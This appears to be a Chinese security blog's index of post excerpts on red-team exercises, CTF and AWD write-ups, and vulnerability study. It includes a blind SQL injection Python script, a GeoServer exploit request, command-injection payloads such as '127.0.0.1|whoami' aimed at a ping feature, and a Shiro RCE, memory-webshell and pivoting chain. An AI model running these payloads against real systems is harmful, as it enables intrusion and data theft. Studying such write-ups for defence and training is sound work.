c0ll4r

background一次地区的hw 规模很小 记录一下主要是这个洞利用起来有点意思 再有就是 这是我hw这么久以来打出的最具有价值的漏洞 几千万的数据 离谱到啥程度呢 直接在里面给我对象奶奶的三要素给查出来了 打点开局是很朴实无华的弱口令 进的后台 a.com 抓包发现数据是从b.com拉取过来的 后面发现其实cookie也是b.com下发的 直接访问b.com 403 带路径访问也是403 但是我发现路径里有geoserver 于是测一下geoserver的poc 没反应 就没去管了 POST /geoserver/wms HTTP/1.1Content-Type: application/xmlAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36Accept-Encoding: gzip, deflateHost: xxx.xxx.xxx.xxxCo ...

background之前的一次打过这个系统 然后发现与之前打的系统是一样的 之前怎么打进去的呢？是别人iis短文件名泄露拿的源码审的洞。至于poc啊，我也没有啊，报告里也没写全这个poc。但是好在有路径，但是数据包我是真看不懂，一堆啥玩意啊，他报告里也没写，就标了个漏洞点的函数。那只能我自己试试了，然后我才知道，虽然能直接上aspx的木马，是解释型语言，但是这玩意同样要编码，直接是看不到源码的，得反编译一下。从来没接触过，只能试试，用的ilspy。 路由追踪web页面的触发点和路径已经有了 现在就是不知道需要提交什么样的参数 打开对应的asmx页面 发现啥也没有 东西都在app_code里面去了 然后类名也有了 直接反编译这个dll 找到对应的类 点开这个箭头里面有一大堆类 找到了 然后发现这里是走了DESDeCode 直接进到CsSubDes里去看 这里就是常规的DES解密 秘钥都有了 然后就手扣报告里的数据拿去解密 需要解密出来的结果是900 因为最终要走SubUpLoadImage实现文件上传 死活解不出来 其实是我只放了key却忽略了iv 这里的key和i ...

没啥好说的 直接上exp 为啥不过完全呢 因为只执行了一个内置函数 至于怎么select数据出来 我不知道 这里是挖洞 跑个user()就行了 不需要进一步利用 其实就是把关键字进行一次url全编码 然后再编码一次 user()使用CURRENT_USER()替换了 import requestsfrom urllib3.exceptions import InsecureRequestWarningrequests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)import timewords=''payload=f"name=1%27%29or%2F**%2F%28%40%40version_compile_os%29+like+%27{words}%25%27--+"chars = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!\&quo ...

一直以来都想做一个很完善的平台 能hw 能ctf 能awd 能awdp…… 还想要炫酷的大屏 实时展示 docker很好用 但是之前弄ssrf的时候都是单独起一个redis 一下子起两个容器 平台上面不好启 平台一次只能启一个容器 并且网络配置也有问题 一般都是用docker-compose去启 最好的是docker in docker 这样子问题就很好解决了

总共需要拿到6个flag shiro反序列化打开一看这个remember me就像是shiro 利用工具下载地址： https://github.com/SummerSec/ShiroAttack2/releases 用工具检测了一下发现是shiro框架 爆破找到了秘钥 然后爆破一下利用链和回显地址 成功rce flag在env里 直接打个内存马 查看发现是单网卡机器 传个fscan上去扫一下 fscan下载地址 https://github.com/shadow1ng/fscan/releases 给fscan权限 chmod 777 fscan_amd64 扫一下c段 ./fscan_amd64 -h 172.16.238.10/24 这里先用nps搭个代理 代理工具下载地址 https://github.com/ehang-io/nps/releases 下这两个文件 一个是客户端的 一个是服务端的 使用教程 https://github.com/ehang-io/nps/blob/master/README_zh.md 其中conf文件夹下的nps.con ...

这里主要想写一下fastjson这类万金油漏洞的具体打法 主要也是学习一些java的知识。对这个漏洞的停留我也只是停留在扫描器扫描 然后网上随便复制个poc直接打 迄今为止我也没复现成功过这玩意 所以想着先复现一次rce 然后跟两篇高质量文章 但估计也跟不完 明天还是得给客户完善一下答辩的事情 唉 好难 vulhub-1.2.24用插件直接扫能发现洞 会自动检测所有数据包 然后进行探测 https://github.com/pmiaowu/BurpFastJsonScan/releases 漏洞分析文章 https://forum.butian.net/share/3055 https://forum.butian.net/share/3096 fastjson的序列化与反序列化package org.example;import com.alibaba.fastjson.JSON;public class Main { public static void main(String[] args) { // 将一个 Java 对象序列化为 ...

background真就没啥事做 我也一直在想自己比三年前的自己强了些什么？但总是感觉强了 然后就想这个靶机来试试看 检验一下自己的综合能力 MATRIX-BREAKOUT-信息搜集先直接访问ip就是拒绝连接，fscan和nmap来个全套扫描 啥收获都没有 实际上是没获取到ip地址 然后装个virtualbox 然后这玩意要下载三个东西才能用 我记得之前一直都是一个软件直装的啊 参考https://zhuanlan.zhihu.com/p/111567471 http://download.virtualbox.org/virtualbox/7.0.18/ 我装在自定义的位置(貌似只能根目录)还要授权 参考https://blog.csdn.net/nancyjiang/article/details/139098236 icacls C:\VirtualBox /reset /t /cicacls C:\VirtualBox /inheritance:d /t /cicacls C:\VirtualBox /grant *S-1-5-32-545:(OI)(CI)(RX)icacl ...

background本机双网卡 目标机器不出网 与本机物理连接 想要别人也能访问到目标机器 于是使用本机做桥梁 踩了一些坑 大概是跟版本有些问题 我这里用的是0.44.0 服务端修改frps.ini [common]bind_port = 7000dashboard_port = 7500nohup ./frps & 客户端[common]server_addr = 服务器ipserver_port = 7000[halo]type = tcplocal_ip = 192.168.3.111local_port = 80remote_port = 8090 cmd运行即可 访问服务器8090端口即可

background华中选拔赛落幕了 这次比赛没有取得想要的成绩 我也发现了自己的一些问题 有时候真的就是一个很简单的问题 半天看不懂 然后挺容易手忙脚乱的 emmmm 有的题真的感觉不难 但是自己真的没接触过java awdp的时候全程在死磕php 也是逆天了 全程0解 我们一共就出了个nosql注入的flag 也不会修 真是废了 而且10轮的时候才交上去 有个pwn真的是被干烂了 反正我们是被打爆了 awd-php漏洞点一打开就是一个登录框 常规操作 备份数据库 源码 打包d盾扫一下 一眼的马子 直接删掉或者写成其他的东西 研究一下怎么用 这里是goto加密了 我看到的时候第一时间就慌了 真就是很简单的一个东西我都没看出来 赛后别人写框出来贴我脸上了我才看懂 我们没靠这个后面吃到啥分 我们抓到流量的时候感觉已经晚了 大家都修的差不多了 直接就输出出来就完事了啊 我还去解密解啥啊 真的是蠢 直接system里面接post参数game就完事了 接下来脚本批量打就行了 没啥说的 i春秋的平台挺好的 支持一大段flag提交 绿盟的还得写个提交的脚本 漏洞点一-fi ...

background看见公众号发了个day 搜了一下发现全网首发这个rce啊 其他地方发的都是任意文件读取 文件读取嘛 这个洞没啥太大的卵用 其实 但我看到是php的系统 任意文件读取有时候还是能出货的 读点源码审一下还是可以的 这个rce的poc要钱 其他有的公众号文件读取的还是不要钱的 fuzz 这里主要记录自己测试的过程 准备读点代码来看的 但是运气很好 一来就若进去了一个系统 admin 123456 yyds 后台找找能rce的地方 最爱的ping 这输入不了 是因为我之前fuzz的时候整废了 这个口子命令有问题就废了 只是前端废了 输入不了了 正常发两个包 看看数据包 正常fuzz addr_value=219&pingname=127.0.0.1|whoami&pingtime=2&packetsize=1addr_value=219&pingname=127.0.0.1;whoami&pingtime=2&packetsize=1 没反应 回显是白的 前端还卡死了 盲打ping dns addr_val ...